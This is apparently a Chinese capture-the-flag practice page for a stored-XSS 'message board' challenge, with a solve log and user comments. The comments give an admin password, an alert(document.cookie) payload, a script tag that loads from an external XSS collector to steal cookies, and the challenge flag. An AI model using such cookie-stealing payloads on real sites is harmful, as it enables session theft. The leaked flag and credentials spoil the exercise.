留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
3044
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评分(18)
解题动态
solomom 攻破了该题 35分钟前
泡泡鱼 攻破了该题 1小时前
walkerming 攻破了该题 23小时前
吴王饭差 攻破了该题 1天前
2177989632 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
aaaaab 攻破了该题 1天前
2021060287 攻破了该题 2天前
lianhaorui 攻破了该题 3天前
xiaona1111 攻破了该题 5天前
Adwuwuuuuc 攻破了该题 5天前
(eleven) 攻破了该题 6天前
3396516192 攻破了该题 7天前
azzr997 攻破了该题 8天前
15321809027 攻破了该题 9天前
eason2023 攻破了该题 9天前
huasir 攻破了该题 11天前
孙燕姿圈外男友 攻破了该题 11天前
1045123 攻破了该题 11天前
评论
sisa 2年前
举报
dirmap、dirsearch、dirb都扫不出sql文件,看wp直接访问db.sql得到是The requested URL was not found on this server.真不知你们是怎么知道密码的?
safeweb20 2年前
举报
这道题通过dirsearch.py 扫描网址找到sql账号数据之后登录admin账户,通过xss注入可以找到flag, 管理员密码是011be4d65feac1a8 账户是admin xss可以使用<script>alert(document.cookie);</script>
bigbox1 2年前
举报
这个题有问题,管理员密码是011be4d65feac1a8,作者把那个文件删了应该是,那个登录框不是sql注入
sshui 2年前
举报
nmd,改题了也不及时说明。凸(艹皿艹 )
admin999 2年前
举报
XSS插进图片了,不过好像收不到flag啊?
sshui 2年前
举报
@admin999 找后台
admin999 2年前
举报
@sshui 所以这题现在怎么做...
sshui 2年前
举报
改题了
anguilin 2年前
举报
沙比题
Striker123456 2年前
举报
尖括号字体实体,双引号转义,src自动加上http://。这怎么做?
b1lld 2年前
举报
我说你们这些网站出题人是在干嘛啊?新手题官方wp写的那么简短,能缩写就整缩写,突出的就是一个边看文章边查才能体现你的深度是吧?一道入门题硬是要查几篇博客一顿查是吧?一道题本来好不容易搜到几篇wp能看的,咔咔一顿操作,做到一半发现原来的做题思路行不通了,哦,看下评论,题目改了。我说你们是在干嘛啊????新手题诶???建这个网站的目的不是让人学习吗??不是为了让人入门吗???不是为了让人按照一个思路去
anguilin 2年前
举报
咋做
skiller 2年前
举报
db.sql是怎么搜出来的?我用dir没搜出来啊?
BugKugirl 2年前
举报
在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)